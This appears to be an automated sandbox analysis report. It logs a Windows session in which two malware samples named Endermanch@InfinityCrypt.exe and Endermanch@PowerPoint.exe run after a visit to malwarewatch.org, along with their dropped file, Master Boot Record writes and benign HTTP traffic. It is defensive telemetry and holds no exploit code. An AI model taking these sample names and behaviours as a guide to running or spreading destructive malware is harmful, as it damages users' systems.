PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://malwarewatch.org1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff85efe46f8,0x7ff85efe4708,0x7ff85efe47182⤵PID:3224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:22⤵PID:1268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:82⤵PID:2080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:12⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:1028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:12⤵PID:1100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:12⤵PID:3044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:82⤵PID:4368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:12⤵PID:5244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:12⤵PID:5252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:12⤵PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:12⤵PID:5448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:12⤵PID:5836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4888 /prefetch:82⤵PID:1280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4276 /prefetch:82⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2244 /prefetch:12⤵PID:6028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5948 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6204 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:12⤵PID:5332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,13707963284536786816,1240677369002786674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5260
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2544
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2760
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:868
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1372
-
C:\Users\Admin\Desktop\Endermanch@InfinityCrypt.exe"C:\Users\Admin\Desktop\Endermanch@InfinityCrypt.exe"1⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4912
-
C:\Users\Admin\Desktop\Endermanch@PowerPoint.exe"C:\Users\Admin\Desktop\Endermanch@PowerPoint.exe"1⤵
- Writes to the Master Boot Record (MBR)
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\sys3.exeC:\Users\Admin\AppData\Local\Temp\\sys3.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
PID:5736
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa389d855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:876
Network
-
Remote address:8.8.8.8:53Requestmalwarewatch.orgIN AResponsemalwarewatch.orgIN A104.21.46.176malwarewatch.orgIN A172.67.168.207
-
Remote address:104.21.46.176:80RequestGET / HTTP/1.1
Host: malwarewatch.org
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 13 May 2024 20:48:05 GMT
Location: https://malwarewatch.org/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dzQobmsGqTjkXr2uLIWTcV2Cf7BeVm%2FpfwK%2BJ7sBUZ7adHPAE1DSamG05fskyYGr3V0V6vo%2FF5jMAvV6wTOj%2B1otOLDlUhb3BOWM4ennY98k4Ktwzmc7SyH066LrKlX6i82%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 883529fecba193dd-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET / HTTP/2.0
host: malwarewatch.org
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
last-modified: Sun, 28 May 2023 15:38:52 GMT
cache-control: public, max-age=90, immutable
x-content-type-options: nosniff
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ef87MoOQ6T6tDAWA4b4gsVhxRUOtt9znkKn28ghF82AIVuOty0rmw%2FzTVRd4APGDqVWFd%2Bsr4z1J%2BwiNIcZHktCHlmn9cFd6xU2D8xkw2MvhSz3LV52pB7WtUe4YOvaAWk3p"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 883529ffc9d96376-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /styles/styles.css HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=utf-8
content-length: 16711
last-modified: Mon, 18 Apr 2022 15:26:17 GMT
etag: "625d8319-4147"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446926
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZ5xTrdDT9yckwQVMYSbSmJmfzhe4hdp8M5PajbeZ5enTiDxmRMB07nDO6xWt%2BUzMl1EMvuMwrs5VziqYkXnthF62LFFPvo%2F8v9fcsES0laxfdkE7PUvAIVKyI5CAA1NIRJf"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a014d0b6376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /scripts/videoList.js HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
content-length: 1500
last-modified: Sat, 03 Apr 2021 19:42:50 GMT
etag: "6068c53a-5dc"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4p2ADpcP2b%2FJBOTYVBPjs5AcQ7ThI1tonGapJTaKS%2B7l%2F%2BAgLWW9Grv0OR97q0DFFTGCj8jY23uqzR2ON3BE2kEvACtS35JmdgkRLl3JffKm96Fv06dBnPSaJKDTT559Y7Yf"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a01be086376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /scripts/sideBar.js HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
content-length: 1446
last-modified: Sun, 25 Jul 2021 17:39:49 GMT
etag: "60fda1e5-5a6"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yvmIkwQGOI1SaC2LCgJ0SnG6EO0XIoRYg9aBc9NUgTL7i53DbUd%2BaC%2BS%2Fmi8GsWsiL4greMlzWCZsf9d%2FZqvFeZ2ExaUdMqG7FoLLCWBQNAXOMLP4pUGjX8CSFhgMzsQu9Cd"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a02f8476376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/logo.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 157589
last-modified: Fri, 12 Feb 2021 15:48:58 GMT
etag: "6026a36a-26795"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPdiOMyvqd2a8z8gWzM8u7PXlBOULWkQ6y55fqNRGC8Kxr40JfuLJzn8yStsJzYLcRLZRabxNHV7YLYfHjqwYkxJd6kGqg4fvLlasE84Qlco7wFEf%2BMiuxUAro1PmWm%2F09Le"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a0358f26376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/software.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 3946
last-modified: Sun, 21 Feb 2021 16:41:46 GMT
etag: "60328d4a-f6a"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLl6Gn1jy1tbFRLagsygsNxuMGovMg3ZXLpSMlO3lQ%2FcFe9gVCMV2QJy0lq0GfFM8Bn8yTRscBL3mqRj6mCZ1GWpW2aibeUxqGlTv%2FOwOtBGMu5IEBvY%2Fz9IG7iurtkUOGt7"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a040a3e6376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/library.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 2624
last-modified: Sun, 21 Feb 2021 16:40:40 GMT
etag: "60328d08-a40"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 395473
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XyXIjt04C91zZP0rr6FWoTmU%2FYnPJwGG6n0xd%2Ffi4x9zKC2%2FUc9BAj3NIYryHZt%2BdyH4mu%2B9AJRdxUBiuicVLqT5dRRjDKDHK9xxqAE7JM%2BVGMCDDNO5oulgyzWJRZqRn9of"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a040a556376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/defrag.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 3907
last-modified: Sun, 21 Feb 2021 18:30:12 GMT
etag: "6032a6b4-f43"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8RHG837W2iEqeei440t5iZNqGWyhdahsAQ4mPwxrmVDXTETFq1GNrTcFfgUyOrzUOU2dxCnvWZZ%2FoIiStrW7RkeK9CQ9MzSbeCud37y7%2BvbeuPn7FbLIoELzGOaFph7v5GW"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a040a586376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/config.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 1757
last-modified: Sun, 21 Feb 2021 17:02:00 GMT
etag: "60329208-6dd"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sSd3ulGvWIx5QIYLPQ629v7QNwdz0XEmtojkHwCR3yyFpD5tfc1g3tWiqMqzmWBBR2AwV574sWux%2FIbL%2BLub1SZjC5tkW3cXNsXlqr9jjMmFHTebkEOSn5%2Fl5LGZPC1nNKHF"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 88352a040a616376-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.46.176:443RequestGET /images/icons/help.png HTTP/2.0
host: malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 3289
last-modified: Sun, 21 Feb 2021 17:07:14 GMT
etag: "60329342-cd9"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 4446927
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nen%2B3%2FXF7dZ%2B2J52ebYqmCFFFxoiu%2F%2FvssqTEjBHjAA%2FIWjTOryVf7bm%2BzxRVAdJadaC6n75EvZrhB5uWBjxaggVIoiyEPUILph%2B%2BRwmNZLSRbr16%2B53IVIpHXT8r6FoDp0D"}],"group":"cf-nel","max_age":604800}
